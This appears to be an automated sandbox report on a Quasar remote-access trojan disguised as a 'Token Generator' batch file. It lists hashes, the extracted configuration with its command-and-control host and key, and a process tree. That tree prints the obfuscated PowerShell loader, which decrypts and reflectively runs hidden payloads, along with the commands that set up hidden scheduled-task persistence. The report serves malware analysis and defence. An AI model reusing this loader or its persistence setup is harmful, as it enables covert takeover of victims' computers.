Analysis
-
max time kernel: 300s
max time network: 302s
platform: windows11-21h2_x64
resource: win11-20240508-en
resource tags: arch:x64, arch:x86, image:win11-20240508-en, locale:en-us, os:windows11-21h2-x64, system
submitted: 26-05-2024 20:56
Static task: static1
Behavioral task: behavioral1
Sample: Token Generator.bat
Resource: win10v2004-20240426-en
General
-
Target: Token Generator.bat
Size: 3.5MB
MD5: e984ebea899379a8c0a47f9308c7370b
SHA1: 863330006bef4c55a1bc79771ae989dc0412f717
SHA256: 9f413ae8218ec74eb61a052e1c2b8b27f8ee7038902db5aaea9c93e0752fa48b
SHA512: 70934def86e93b350e72711e757cbe0a97a9a58259f184e2c97aeea3a2b9f016bb03e4fb499f3876248bfb43edec5e3949599448d95235afcb1b46d71362b975
SSDEEP: 49152:HgquNH3RLlp72pnTcrwIBX1F2A5LzeuUxZ3u3AnCH4El0oKYlL:HY
Malware Config
Extracted
quasar
reconnect_delay: 3000
Extracted
quasar
1.4.1
Token Gen
uk2.localto.net:6103
0c14e9f2-6918-4e50-8463-04ad871c1e3d
encryption_key: 6BE0D74806BB58E6DB21FA6E3B6DB38B4A72BAFC
install_name: $77-powershell.exe
log_directory: $77-Logs
reconnect_delay: 3000
startup_key: Discord
subdirectory: $77-Rootkit
Signatures
-
Quasar payload 4 IoCs
Processes:
resource | yara_rule
behavioral2/memory/4568-14-0x000002A947A70000-0x000002A947F0E000-memory.dmp | family_quasar
behavioral2/memory/1776-52-0x00000117FD2D0000-0x00000117FD5F4000-memory.dmp | family_quasar
C:\Users\Admin\AppData\Local\Temp\Token Generator.exe | family_quasar
behavioral2/memory/1696-63-0x0000000000900000-0x0000000000C24000-memory.dmp | family_quasar
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
description | pid | process | target process
PID 3748 created 636 | 3748 | powershell.EXE | winlogon.exe
-
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
Processes:
pid | process
1776 | powershell.exe
4568 | powershell.exe
3332 | powershell.exe
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
description | ioc | process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate | wmiprvse.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | wmiprvse.exe
-
Executes dropped EXE 4 IoCs
Processes:
pid | process
1696 | Token Generator.exe
4768 | Install.exe
3400 | $77-powershell.exe
4400 | $77-powershell.exe
-
Drops file in System32 directory 13 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
Processes:
description | pid | process | target process
PID 3748 set thread context of 3024 | 3748 | powershell.EXE | dllhost.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
pid | process
2096 | schtasks.exe
1020 | schtasks.exe
4184 | schtasks.exe
-
Modifies data under HKEY_USERS 57 IoCs
-
Modifies registry class 1 IoCs
Processes:
description | ioc | process
Key created | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000_Classes\Local Settings | powershell.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
pid | process
3400 | $77-powershell.exe
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exe (depth 1)
Command line: winlogon.exe
PID:636
-
C:\Windows\system32\dwm.exe (depth 2)
Command line: "dwm.exe"
PID:480
-
C:\Windows\System32\dllhost.exe (depth 2)
Command line: C:\Windows\System32\dllhost.exe /Processid:{6d4fe61d-73d6-454d-b21b-7389d0b4e439}
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3024
-
C:\Windows\system32\lsass.exe (depth 1)
Command line: C:\Windows\system32\lsass.exe
PID:692
-
C:\Windows\system32\svchost.exe (depth 1)
Command line: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
PID:992
-
C:\Windows\System32\svchost.exe (depth 1)
Command line: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
PID:716
-
C:\Windows\system32\svchost.exe (depth 1)
Command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
PID:960
-
C:\Windows\System32\svchost.exe (depth 1)
Command line: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
PID:1064
-
C:\Windows\system32\svchost.exe (depth 1)
Command line: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
PID:1076
-
C:\Windows\system32\svchost.exe (depth 1)
Command line: C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
PID:1172
-
C:\Windows\system32\svchost.exe (depth 1)
Command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
PID:1232
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE (depth 2)
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3748
-
C:\Windows\System32\svchost.exe (depth 1)
Command line: C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
PID:1268
-
C:\Windows\system32\svchost.exe (depth 1)
Command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
PID:1340
-
C:\Windows\system32\svchost.exe (depth 1)
Command line: C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
PID:1384
-
C:\Windows\System32\svchost.exe (depth 1)
Command line: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
- Drops file in System32 directory
PID:1400
-
C:\Windows\system32\svchost.exe (depth 1)
Command line: C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
PID:1452
-
C:\Windows\System32\svchost.exe (depth 1)
Command line: C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
PID:1464
-
C:\Windows\system32\svchost.exe (depth 1)
Command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
PID:1560
-
C:\Windows\system32\sihost.exe (depth 2)
Command line: sihost.exe
PID:2732
-
C:\Windows\system32\svchost.exe (depth 1)
Command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
PID:1708
-
C:\Windows\System32\svchost.exe (depth 1)
Command line: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
PID:1748
-
C:\Windows\system32\svchost.exe (depth 1)
Command line: C:\Windows\system32\svchost.exe -k NetworkService -p
PID:1768
-
C:\Windows\System32\svchost.exe (depth 1)
Command line: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
PID:1812
-
C:\Windows\system32\svchost.exe (depth 1)
Command line: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
PID:1884
-
C:\Windows\System32\svchost.exe (depth 1)
Command line: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
PID:1968
-
C:\Windows\system32\svchost.exe (depth 1)
Command line: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
PID:1976
-
C:\Windows\System32\svchost.exe (depth 1)
Command line: C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
PID:1964
-
C:\Windows\system32\svchost.exe (depth 1)
Command line: C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
PID:1852
-
C:\Windows\System32\spoolsv.exe (depth 1)
Command line: C:\Windows\System32\spoolsv.exe
PID:2132
-
C:\Windows\System32\svchost.exe (depth 1)
Command line: C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
PID:2272
-
C:\Windows\system32\svchost.exe (depth 1)
Command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
PID:2368
-
C:\Windows\system32\svchost.exe (depth 1)
Command line: C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
PID:2388
-
C:\Windows\system32\svchost.exe (depth 1)
Command line: C:\Windows\system32\svchost.exe -k NetworkService -p
- Drops file in System32 directory
PID:2432
-
C:\Windows\System32\svchost.exe (depth 1)
Command line: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
PID:2448
-
C:\Windows\system32\svchost.exe (depth 1)
Command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
PID:2484
-
C:\Windows\sysmon.exe (depth 1)
Command line: C:\Windows\sysmon.exe
PID:2564
-
C:\Windows\System32\svchost.exe (depth 1)
Command line: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
PID:2580
-
C:\Windows\system32\svchost.exe (depth 1)
Command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
PID:2596
-
C:\Windows\system32\svchost.exe (depth 1)
Command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
PID:2624
-
C:\Windows\system32\svchost.exe (depth 1)
Command line: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
PID:536
-
C:\Windows\system32\wbem\unsecapp.exe (depth 1)
Command line: C:\Windows\system32\wbem\unsecapp.exe -Embedding
PID:2620
-
C:\Windows\Explorer.EXE (depth 1)
Command line: C:\Windows\Explorer.EXE
PID:3308
-
C:\Windows\system32\cmd.exe (depth 2)
Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Token Generator.bat"
- Suspicious use of WriteProcessMemory
PID:2000
-
C:\Windows\System32\Conhost.exe (depth 3)
Command line: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
PID:1164
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('l7xIjD7w3X9IZsoce95u+FWxpwh41oGtZjuJWP8Q3+U='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7Ji4GPB6lVnv6Xlch9sujw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $aXkIe=New-Object System.IO.MemoryStream(,$param_var); $bzUdJ=New-Object System.IO.MemoryStream; $mnRoM=New-Object System.IO.Compression.GZipStream($aXkIe, [IO.Compression.CompressionMode]::Decompress); $mnRoM.CopyTo($bzUdJ); $mnRoM.Dispose(); $aXkIe.Dispose(); $bzUdJ.Dispose(); $bzUdJ.ToArray();}function execute_function($param_var,$param2_var){ $ncCdx=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $NjXjX=$ncCdx.EntryPoint; $NjXjX.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Token Generator.bat';$jtmXF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Token Generator.bat').Split([Environment]::NewLine);foreach ($yxuaZ in $jtmXF) { if ($yxuaZ.StartsWith(':: ')) { $FJFrF=$yxuaZ.Substring(3); break; }}$payloads_var=[string[]]$FJFrF.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function 
$payload2_var (,[string[]] (''));3⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4568 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_520_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_520.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3332 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_520.vbs"4⤵
- Suspicious use of WriteProcessMemory
PID:908 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_520.bat" "5⤵
- Suspicious use of WriteProcessMemory
PID:3664 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:1740
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('l7xIjD7w3X9IZsoce95u+FWxpwh41oGtZjuJWP8Q3+U='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7Ji4GPB6lVnv6Xlch9sujw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $aXkIe=New-Object System.IO.MemoryStream(,$param_var); $bzUdJ=New-Object System.IO.MemoryStream; $mnRoM=New-Object System.IO.Compression.GZipStream($aXkIe, [IO.Compression.CompressionMode]::Decompress); $mnRoM.CopyTo($bzUdJ); $mnRoM.Dispose(); $aXkIe.Dispose(); $bzUdJ.Dispose(); $bzUdJ.ToArray();}function execute_function($param_var,$param2_var){ $ncCdx=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $NjXjX=$ncCdx.EntryPoint; $NjXjX.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_520.bat';$jtmXF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_520.bat').Split([Environment]::NewLine);foreach ($yxuaZ in $jtmXF) { if ($yxuaZ.StartsWith(':: ')) { $FJFrF=$yxuaZ.Substring(3); break; }}$payloads_var=[string[]]$FJFrF.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function 
$payload2_var (,[string[]] (''));6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1776 -
C:\Users\Admin\AppData\Local\Temp\Token Generator.exe"C:\Users\Admin\AppData\Local\Temp\Token Generator.exe"7⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1696 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Discord" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\$77-Rootkit\$77-powershell.exe" /rl HIGHEST /f8⤵
- Creates scheduled task(s)
PID:1020 -
C:\Users\Admin\AppData\Roaming\$77-Rootkit\$77-powershell.exe"C:\Users\Admin\AppData\Roaming\$77-Rootkit\$77-powershell.exe"8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3400 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Discord" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\$77-Rootkit\$77-powershell.exe" /rl HIGHEST /f9⤵
- Creates scheduled task(s)
PID:4184 -
C:\Users\Admin\AppData\Local\Temp\Install.exe"C:\Users\Admin\AppData\Local\Temp\Install.exe"7⤵
- Executes dropped EXE
PID:4768 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Discord" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\$77-Rootkit\$77-powershell.exe" /rl HIGHEST /f7⤵
- Creates scheduled task(s)
PID:2096 -
C:\Users\Admin\AppData\Roaming\$77-Rootkit\$77-powershell.exe"C:\Users\Admin\AppData\Roaming\$77-Rootkit\$77-powershell.exe"7⤵
- Executes dropped EXE
PID:4400
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3428
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵PID:3472
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3792
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3872
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3940
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc1⤵PID:3964
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}1⤵PID:4248
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc1⤵PID:4332
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:916
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:1004
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:2068
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
PID:4104
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:4876
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:1652
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:2208
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:784
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3404
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
- Checks BIOS information in registry
- Suspicious behavior: EnumeratesProcesses
PID:1128
Network
MITRE ATT&CK Enterprise v15
Downloads